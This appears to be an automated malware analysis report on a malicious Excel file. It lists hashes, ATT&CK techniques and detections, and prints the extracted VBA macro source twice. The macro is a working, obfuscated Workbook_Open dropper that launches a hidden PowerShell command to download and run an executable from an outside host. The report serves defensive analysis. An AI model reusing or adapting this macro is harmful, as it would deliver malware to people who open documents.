Office (OLE) malware analysis — malicious · 4dcd6b3670aedab1

MALICIOUS

Office (OLE)

48.0 KB Created: 2000-07-27 22:23:01 First seen: 2019-05-16

MD5: d9cb39d72fb5c4892be55faa6116b892 SHA-1: c2496f5e2b18a44ba8b46ad58354966080ae993e SHA-256: 4dcd6b3670aedab1c10e5af8c867b9bcc4785f2ee26bd1b174f927846e92c84d

260 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Excel file containing VBA macros. A Workbook_Open macro is present, which is designed to execute automatically when the file is opened. This macro uses obfuscation techniques, including splitting string literals, to reassemble dangerous API names like 'cmD.EXE'. The script attempts to download a second-stage executable from 'http://cloudphotos.party/home' and save it as a random filename in the user's home directory, then execute it. This indicates a downloader or dropper functionality.

Heuristics 6

ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3097 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3097 bytes
SHA-256: `3fcffc116f1bb714ac0ae1d8bf2615425d155968c8ebc5aa376c84607045940d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function multitoggler() multitoggler = "EN -ST -N" End Function Function zidanball() zidanball = "\""{1}{0}\"" -f '.W" + "','em') ) ; . ( ${ver`B`os`ePR" + "EFER`eN`cE}.( \""{1}{2}{0}\""-f 'Ng','t',(\""{0}{1}\""-f 'oSt','RI' ) ).\""iNv`oke\""( )[1,3]+ 'X'-joiN'' ) ( ( " End Function Function fekiloko() fekiloko = "Ell -N" End Function Function vintagelamp() vintagelamp = "[sySTeM.wI" + "ndOWs.FOrmS.clipBOaRD]::(\""{0}{1}\""-f'ge',(\""{0}{1}\""-f'TTex','t' ) ).\""iNV`oKe\""( ) ) ) ; [System.WinDows.Forms.Clipboard]::(\""{2}{0}{1}\"" -f ( \""{1}{0}\"" -f 'ex','tT' ),'t','Se' ).\""i`NVo`ke\""(' ')""""" End Function Function ottappii() ottappii = "tIOnpo By" End Function Function asusbooker() asusbooker = sunshinepeople & formulabolid & cioopermini + lidergroups + zidanball + vintagelamp End Function Function farrerol() Dim etallones As String Randomize etallones = Int(Rnd * 9444311#) farrerol = etallones End Function Function cioopermini() muujioji = farrerol mollibenius = "em.Ne" + "t.W" kiroll = "a`dF`i" cioopermini = "SYst" + mollibenius + "ebCl" + "ient).""doW" + "Nl`o" + kiroll + "Le"".""Inv`OKE""(('http://cloud'+'photo'+'s.par'+'ty/h'+'ome'),""$omes\\" + muujioji + ".exe"")}while(!${?});^^^&(""{0}{3}{2}{1}""-f 'S','ess','roc','tart-P') $omes\" + muujioji + ".exe \|cLip.ex" + "E&&c" + "mD.EXE" End Function Function sunshinepeople() sunshinepeople = "cmD.E" + "XE /c ""echO/ sEt-va" + "RIABlE 387n ([TYp" + "E](""{0}{3}{2}{1}"" -f 'E','nT','mE','nv" + "iRoN') ); do{^" + "^^&(""{1}{0}"" -f 'p','sle" + "e') 31;${O" + "m`Es} = (ls VAr" + "Iable:38" + "7N " End Function Function lidergroups() lidergroups = "/cPower" + "sh" + fekiloko + "oPR -E" + "xECU" + ottappii + "paS" + "S -WinD h" + "iDd" + multitoggler + "Onin" + "tE -N" + "Olo "".(\""{2}" + "{0}{1}\""-f '-',( \""{1}{0}\""-f'pe','Ty' ),'Add' ) -Assem ( \""{5}{0}{6}{2}{4}{1}{3}\""-f 'yst',(\""{0}{1}\"" -f 'ws.F','o'),'i" + "nd','rms','o','S',( " End Function Sub Workbook_Open() Shell "" + asusbooker, Unchecked End Sub Function formulabolid() formulabolid = ").Va" + "LuE::('G'+'e" + "tF'+'old" + "erP" + "ath').Invoke(('L'+'oc'+'al" + sistermonth + "}{0}{1}""-f'O','bj" + "ect','N" + "ew-')" End Function Function sistermonth() sistermonth = "Ap'+'plic" + "ati'+'onD" + "ata'));(^" + "^^&(""{2" End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 3fcffc116f1bb714ac0ae1d8bf2615425d155968c8ebc5aa376c84607045940d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
























































Function multitoggler()
multitoggler = "EN  -ST -N"
End Function
Function zidanball()
zidanball = "\""{1}{0}\"" -f '.W" + "','em') ) ;  .  (  ${ver`B`os`ePR" + "EFER`eN`cE}.(  \""{1}{2}{0}\""-f 'Ng','t',(\""{0}{1}\""-f 'oSt','RI'  ) ).\""iNv`oke\""(   )[1,3]+  'X'-joiN''  ) ( (  "
End Function

Function fekiloko()
fekiloko = "Ell  -N"
End Function
Function vintagelamp()
vintagelamp = "[sySTeM.wI" + "ndOWs.FOrmS.clipBOaRD]::(\""{0}{1}\""-f'ge',(\""{0}{1}\""-f'TTex','t'  ) ).\""iNV`oKe\""(   )  )  ) ;  [System.WinDows.Forms.Clipboard]::(\""{2}{0}{1}\"" -f ( \""{1}{0}\"" -f 'ex','tT' ),'t','Se' ).\""i`NVo`ke\""(' ')"""""
End Function
Function ottappii()
ottappii = "tIOnpo By"
End Function
Function asusbooker()
asusbooker = sunshinepeople & formulabolid & cioopermini + lidergroups + zidanball + vintagelamp
End Function
Function farrerol()
Dim etallones As String
Randomize
etallones = Int(Rnd * 9444311#)
farrerol = etallones
End Function
Function cioopermini()
muujioji = farrerol
mollibenius = "em.Ne" + "t.W"
kiroll = "a`dF`i"
cioopermini = "SYst" + mollibenius + "ebCl" + "ient).""doW" + "Nl`o" + kiroll + "Le"".""Inv`OKE""(('http://cloud'+'photo'+'s.par'+'ty/h'+'ome'),""$omes\\" + muujioji + ".exe"")}while(!${?});^^^&(""{0}{3}{2}{1}""-f 'S','ess','roc','tart-P') $omes\" + muujioji + ".exe |cLip.ex" + "E&&c" + "mD.EXE"
End Function

Function sunshinepeople()
sunshinepeople = "cmD.E" + "XE /c ""echO/  sEt-va" + "RIABlE 387n  ([TYp" + "E](""{0}{3}{2}{1}"" -f 'E','nT','mE','nv" + "iRoN')  );  do{^" + "^^&(""{1}{0}"" -f 'p','sle" + "e') 31;${O" + "m`Es} =   (ls  VAr" + "Iable:38" + "7N "
End Function
Function lidergroups()
lidergroups = "/cPower" + "sh" + fekiloko + "oPR -E" + "xECU" + ottappii + "paS" + "S -WinD  h" + "iDd" + multitoggler + "Onin" + "tE  -N" + "Olo   "".(\""{2}" + "{0}{1}\""-f '-',(  \""{1}{0}\""-f'pe','Ty' ),'Add' ) -Assem ( \""{5}{0}{6}{2}{4}{1}{3}\""-f 'yst',(\""{0}{1}\"" -f 'ws.F','o'),'i" + "nd','rms','o','S',( "
End Function

Sub Workbook_Open()
Shell "" + asusbooker, Unchecked
End Sub


Function formulabolid()
formulabolid = ").Va" + "LuE::('G'+'e" + "tF'+'old" + "erP" + "ath').Invoke(('L'+'oc'+'al" + sistermonth + "}{0}{1}""-f'O','bj" + "ect','N" + "ew-')"
End Function
Function sistermonth()
sistermonth = "Ap'+'plic" + "ati'+'onD" + "ata'));(^" + "^^&(""{2"
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.